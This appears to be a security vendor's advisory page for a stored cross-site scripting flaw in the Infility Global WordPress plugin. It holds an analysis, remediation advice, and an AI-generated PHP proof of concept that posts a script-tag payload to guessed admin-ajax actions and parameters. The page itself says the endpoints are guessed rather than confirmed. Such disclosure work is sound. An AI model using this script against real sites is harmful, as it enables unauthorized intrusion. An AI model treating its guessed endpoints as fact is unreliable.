Atomic Edge Proof of Concept automated generator using AI diff analysis
Published : March 18, 2026

CVE-2025-68864: Infility Global <= 2.14.49 – Unauthenticated Stored Cross-Site Scripting (infility-global)

Severity High (CVSS 7.2)
CWE 79
Vulnerable Version 2.14.49
Patched Version
Disclosed January 14, 2026

Analysis Overview

Atomic Edge analysis of CVE-2025-68864 (metadata-based):
This vulnerability is an unauthenticated stored cross-site scripting (XSS) flaw in the Infility Global WordPress plugin, affecting versions up to and including 2.14.49. The vulnerability allows attackers to inject arbitrary JavaScript into pages that execute when users view the compromised content. The CVSS score of 7.2 (High) reflects the attack’s network accessibility, low complexity, and scope change impact.

Atomic Edge research indicates the root cause is insufficient input sanitization and output escaping, as classified by CWE-79. This suggests the plugin processes user-supplied input without proper validation or sanitization before storing it in the database. The stored data is then rendered on public pages without adequate output escaping. These conclusions are inferred from the CWE classification and vulnerability description, as no source code diff is available for confirmation.

The exploitation method likely involves submitting malicious payloads to a publicly accessible endpoint. Attackers would target AJAX handlers (`/wp-admin/admin-ajax.php`) with action parameters containing the plugin slug prefix, or REST API endpoints (`/wp-json/infility-global/`). The payload would contain JavaScript, possibly obfuscated, that executes when the stored content renders. Attackers might use parameters like `title`, `content`, or custom field names that the plugin processes without sanitization.

Remediation requires implementing proper input validation and output escaping. The plugin should validate all user input against expected data types and formats. It must sanitize input using WordPress functions like `sanitize_text_field()` or `wp_kses()`. For output, the plugin should escape dynamic content with `esc_html()`, `esc_attr()`, or `wp_kses_post()` depending on context. WordPress nonce verification and capability checks should also be implemented for all data modification endpoints.

Successful exploitation enables attackers to execute arbitrary JavaScript in victims’ browsers. This can lead to session hijacking, administrative account takeover, content defacement, or redirection to malicious sites. The stored nature means a single injection affects all users viewing the compromised page. Attackers could create malicious administrator accounts, modify site content, or steal sensitive data from authenticated users.

Differential between vulnerable and patched code

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

 
PHP PoC
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2025-68864 - Infility Global <= 2.14.49 - Unauthenticated Stored Cross-Site Scripting
<?php
/**
 * Proof of Concept for CVE-2025-68864
 * Assumptions based on WordPress plugin patterns:
 * 1. Plugin uses AJAX handlers with action parameter containing 'infility_global' prefix
 * 2. Vulnerable endpoint accepts unauthenticated POST requests
 * 3. Specific parameter names are unknown, so we test common candidates
 * 4. Payload is stored and executes on public pages
 */

$target_url = 'http://example.com/wp-admin/admin-ajax.php';

// Common AJAX action names based on plugin slug
$possible_actions = [
    'infility_global_save',
    'infility_global_update',
    'infility_global_submit',
    'infility_global_process'
];

// Common parameter names that might accept unsanitized input
$possible_params = ['content', 'data', 'html', 'text', 'value', 'settings'];

// XSS payload that creates a visible alert for verification
$payload = '<script>alert("Atomic Edge CVE-2025-68864 PoC");</script>';

foreach ($possible_actions as $action) {
    echo "Testing action: $actionn";
    
    foreach ($possible_params as $param) {
        $post_data = [
            'action' => $action,
            $param => $payload
        ];
        
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL, $target_url);
        curl_setopt($ch, CURLOPT_POST, true);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post_data);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        
        $response = curl_exec($ch);
        $http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
        
        echo "  Param '$param': HTTP $http_coden";
        
        if ($http_code == 200 && stripos($response, 'success') !== false) {
            echo "  [POSSIBLE SUCCESS] Check target site for XSS alertn";
        }
        
        curl_close($ch);
        sleep(1); // Rate limiting
    }
}

echo "nNote: This PoC tests common patterns. Actual exploitation requiresn";
echo "identifying the exact endpoint and parameter names through further testing.n";
?>

Frequently Asked Questions

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations

Trusted by Developers
Blac&kMcDonaldCovenant House TorontoAlzheimer Society CanadaUniversity of TorontoHarvard Medical School